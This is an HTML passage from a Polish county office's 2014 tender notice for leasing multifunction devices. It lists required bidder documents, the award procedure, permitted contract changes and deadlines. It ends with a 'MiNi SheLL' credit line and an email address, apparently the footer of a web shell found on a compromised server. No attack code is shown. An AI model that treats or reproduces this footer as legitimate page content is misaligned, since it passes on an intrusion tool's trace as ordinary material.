<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty stanowiący załącznik nr 1 do SIWZ
2.	Parafowany przez Wykonawcę projekt umowy stanowiący załącznik nr 7 do SIWZ
3.	Wykaz realizacji przynajmniej trzech dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o treści podobnej z przedmiotem niniejszego zamówienia tj. dostawy z minimum trzech zrealizowanych umów na najem wraz z usługami serwisowymi lub na dostawę urządzeń wielofunkcyjnych w kwocie nie mniejszej niż 100.000,00 zł brutto na każda z nich oraz załączeniem dokumentów potwierdzających, że dostawy wraz z montażem zostały wykonane należycie.Wzór wykazu stanowi załącznik nr 5 do SIWZ. Do wykazu należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane należycie.
4.	Oświadczenie Wykonawcy, jeżeli zamierza powierzyć Podwykonawcy wykonanie usługi - załącznik nr 6 do SIWZ. W celu wykazania braku podstaw do wykluczenia 
z postępowania o udzielenie zamówienia Wykonawcy, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu od podwykonawcy oświadczenia o braku podstaw do wykluczenia z art. 24 ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru Wykonawcy:w stosunku do osób - zmiany osób reprezentujących na skutek zmian organizacyjnych,zmiany danych adresowych - w przypadku zmiany siedziby,zmian korzystnych z punktu widzenia realizacji umowy, w szczególności obniżających koszty ponoszone przez Zamawiającego,w sytuacji zmiany wynagrodzenia na dany rok tj.a) w przypadku wyczerpania w danym roku kalendarzowym kwot określonych w umowie, wartość przedmiotu zamówienia dla tego roku może zostać zwiększona kosztem lat kolejnych, bez zwiększania ogólnej wartości przedmiotu umowy,b) w przypadku niewykorzystania w danym roku kalendarzowym kwot określonych w umowie, środki mogą zostać przesunięte na kolejne lata.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gnieźnie, ul. Jana Pawła II 9/10,62-200 Gniezno, I piętro, pokój 1.13..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2014 godzina 10:30, miejsce: Starostwo Powiatowe w Gnieźnie, ul. Jana Pawła II 9/10, 62-200 Gniezno, Biuro Obsługi Interesanta, parter budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com